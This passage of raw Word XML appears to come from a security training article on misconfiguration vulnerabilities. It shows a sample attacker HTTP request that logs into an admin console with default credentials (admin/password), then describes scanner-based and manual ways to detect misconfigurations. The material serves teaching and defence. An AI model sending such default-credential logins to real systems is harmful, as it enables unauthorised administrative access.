        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Attacker Request Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728FD05F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1239C3A7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>POST /admin/console/login HTTP/1.1 Host: target-app.com Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D1389F3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>username=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>admin&amp;password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A01688"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The system validates the static, unchanged default credentials against its configuration file, grants the attacker administrative access, and returns a session token. The attacker now has full control over the application environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758D1E6B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Discovery &amp; Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D4E5DC"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 xml:space="preserve">Here is how security professionals discover and identify </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Security Misconfiguration</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilities across the development lifecycle, using automated, manual, and behavioral testing techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F82F906" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. Automated Testing (Tool-Based Detection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E981552"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Because security misconfigurations can exist at multiple layers (code, container, server, and cloud), different automated tooling categories target specific layers to spot anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B76E932" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>DAST (Dynamic Application Security Testing) &amp; Network Vulnerability Scanners (e.g., OWASP ZAP, Burp Suite, Nessus):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDCE721" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>What they look for:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> These tools interact with the running application from the outside. They actively look for </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>missing security headers</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>X-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>FrameOptions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Content-Security-Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ), </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>active default paths</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/manager</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/wp-admin</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ), and </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>directory indexing</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (sending a request to </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/images/</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see if a file list returns). They also flag </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>verbose error messages</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> by intentionally injecting bad data to see if a stack trace or server version banner is returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349B86CD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SAST (Static Application Security Testing) &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>IaC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Infrastructure as Code) Scanners (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Semgrep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, SonarQube, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Checkov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tfsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8F2796" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>What they look for:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> These tools analyze source code, deployment files, and configuration scripts before deployment. They scan Kubernetes YAMLs, Terraform files, or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Dockerfiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> looking for anomalies like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>image: latest</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (unpinned versions), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>allow_privilege_escalation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>: true</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , or cloud storage resource configurations set to </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>public-read</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EE796A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">SCA (Software Composition Analysis) Tools (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Snyk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>, Dependency-Check):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B49BC4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>What they look for:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> They flag the use of out-of-date framework dependencies or default development plugins left in production build files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C89A40" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. Manual Code Review (Reading the Source)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD2603E"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When auditing source code, configuration files, and build manifests directly, security reviewers look for specific "red flags," insecure configuration patterns, and dangerous flags:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C2FFF2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Insecure Deployment Framework Configurations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E19D17" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Java (Spring Boot / Struts):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Look for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>management.endpoints.web.exposure.include</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>=*</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (exposing all actuator endpoints to the public) or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>struts.devMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> = true</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in property files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21543B59" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>NET/ASP.NET:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Look for </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
